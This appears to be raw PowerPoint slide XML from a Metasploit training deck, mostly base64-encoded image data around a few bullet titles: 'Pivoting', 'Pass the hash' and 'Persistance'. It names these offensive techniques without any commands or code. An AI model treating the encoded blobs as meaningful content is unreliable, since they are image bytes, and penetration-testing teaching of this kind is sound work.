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96866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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit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7974" y="1143000"/>
            <a:ext cx="8531225" cy="5029200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Advanced Topics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	Pivoting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Pass the hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Persistance</a:t>
            </a:r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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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